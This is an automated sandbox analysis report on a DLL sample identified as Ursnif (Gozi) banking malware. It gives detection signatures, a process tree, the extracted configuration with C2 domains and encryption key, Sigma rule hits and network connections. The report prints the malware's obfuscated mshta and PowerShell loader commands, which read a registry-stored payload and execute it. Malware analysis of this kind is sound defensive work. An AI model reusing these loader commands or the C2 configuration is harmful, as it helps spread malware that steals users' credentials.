Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 61b85f75e6a7c.dll

Overview

General Information

Sample Name:61b85f75e6a7c.dll
Analysis ID:539453
MD5:26788bdf519813ff2600570a5c8e23d9
SHA1:44f22a053e84cd7afcf34a4fa19dbf512c8a624d
SHA256:25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
Tags:brtdllexegoziisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6132 cmdline: loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7004 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7056 cmdline: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 160 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • regsvr32.exe (PID: 7016 cmdline: regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5952 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 7084 cmdline: rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 5832 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • control.exe (PID: 5116 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 2528 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6496 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 2596 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1472 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6428 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 3688 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6312 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 5724 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmpGoziRuleWin32.GoziCCN-CERT
          • 0xff0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00
          Click to see the 71 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
          Sigma detected: Suspicious Call by OrdinalShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7004, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ProcessId: 7056
          Sigma detected: Mshta Spawning Windows ShellShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
          Sigma detected: Suspicious Csc.exe Source File FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5784, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, ProcessId: 6620
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132839797066077040.6448.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.671518506.0000000002E10000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
          Machine Learning detection for sampleShow sources
          Source: 61b85f75e6a7c.dllJoe Sandbox ML: detected
          Source: 61b85f75e6a7c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2
          Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0102D1A3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_010259E6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_0103F63F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_053DF63F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_053CD1A3
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_053C59E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04ABF63F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AAD1A3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_04AA59E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_04C3F63F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_04C259E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_04C2D1A3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0103E230

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: berukoneru.website
          Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 3.20.161.64 187Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: windows.update3.com
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187Jump to behavior
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
